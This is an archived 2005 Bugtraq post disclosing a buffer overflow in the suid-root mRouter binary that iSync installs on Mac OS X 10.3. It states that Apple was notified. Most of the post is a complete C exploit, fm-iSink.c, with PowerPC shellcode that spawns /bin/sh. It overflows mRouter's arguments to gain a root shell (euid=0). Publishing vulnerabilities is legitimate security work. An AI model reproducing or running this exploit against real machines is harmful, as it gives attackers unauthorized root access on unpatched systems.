Mac OS X 10.3 iSync Privilege Escalation

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Mac OS X 10.3 iSync Privilege Escalation
From: Braden Thomas <bjthomas@xxxxxxx>
Date: Sat, 22 Jan 2005 11:26:24 -0800
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Hello everyone, a buffer overflow flaw has been discovered in themRouter suid root binary installed by iSync in OS X 10.3 by default.

Program: /System/Library/SyncServices/SymbianConduit.bundle/Contents/Resources/mRouter

Impact:         Privilege Escalation (root access euid=0)
Discovered:     12th January, 2005

The mRouter binary's buffer overflow is triggered by using the -v and-a switches, and sending a buffer of 4096 bytes. Although I was unableto successfully exploit it because of the call to seteuid(501) early inthe binary, nemo had no problem. He released a proof-of-concept thatresolves this problem and results in euid=0.


Apple has been notified of this bug.

nemo's Exploit:

<------------ fm-iSink.c ----------->

/*
 * fm-iSink.c
 * overflow in mRouter, suid binary used by iSync, on OSX <= 10.3.7
 *
 * written by -( nemo @ felinemenace.org )-
 *
 *                    _,'|             _.-''``-...___..--';)
 *                    /_ \'.      __..-' ,      ,--...--'''
 *                   <\    .`--'''       `     /'
 *                   `-';'               ;   ; ;
 *              __...--''     ___...--_..'  .;.'
 *          fL (,__....----'''       (,..--''
 *
 * http://pulltheplug.org and http://felinemenace.org.
 *
 * Bug discovered by Braden Thomas. Exploit by nemo.
 *
 * -( need a challenge...? )-
 * -( http://www.pulltheplug.org )-
 */

#include <sys/types.h>
#include <string.h>
#include <unistd.h>

#define VULNPROG"/System/Library/SyncServices/SymbianConduit.bundle/Contents/Resources/mRouter"

#define MAXBUFSIZE 4096

char shellcode[] = // Shellcode by b-r00t, modified by nemo.
"\x7c\x63\x1a\x79\x40\x82\xff\xfd\x39\x40\x01\xc3\x38\x0a\xfe\xf4"
"\x44\xff\xff\x02\x39\x40\x01\x23\x38\x0a\xfe\xf4\x44\xff\xff\x02"
"\x60\x60\x60\x60\x7c\xa5\x2a\x79\x7c\x68\x02\xa6\x38\x63\x01\x60"
"\x38\x63\xfe\xf4\x90\x61\xff\xf8\x90\xa1\xff\xfc\x38\x81\xff\xf8"
"\x3b\xc0\x01\x47\x38\x1e\xfe\xf4\x44\xff\xff\x02\x7c\xa3\x2b\x78"
"\x3b\xc0\x01\x0d\x38\x1e\xfe\xf4\x44\xff\xff\x02\x2f\x62\x69\x6e"
"\x2f\x73\x68";

char filler[MAXBUFSIZE];

int main(int ac, char **av)
{
        unsigned int ret  = 0xbffffffa -  strlen(shellcode);
        char *args[] = { VULNPROG, "-v", "-a", filler, NULL };
        char *env[]  = { "TERM=xterm", shellcode, NULL };

        memset(filler,(char)'A',sizeof(filler));
        memcpy(filler+MAXBUFSIZE-5,&ret,4);

        execve(*args, args,env);

        return 0;
}

Prev by Date: bug report comersus Back Office Lite 6.0 and 6.0.1
Next by Date: (MS05-002) Cursor and Icon Format Handling Vulnerability (PoC for all affected systems)
Previous by thread: bug report comersus Back Office Lite 6.0 and 6.0.1
Next by thread: (MS05-002) Cursor and Icon Format Handling Vulnerability (PoC for all affected systems)
Index(es):
- Date
- Thread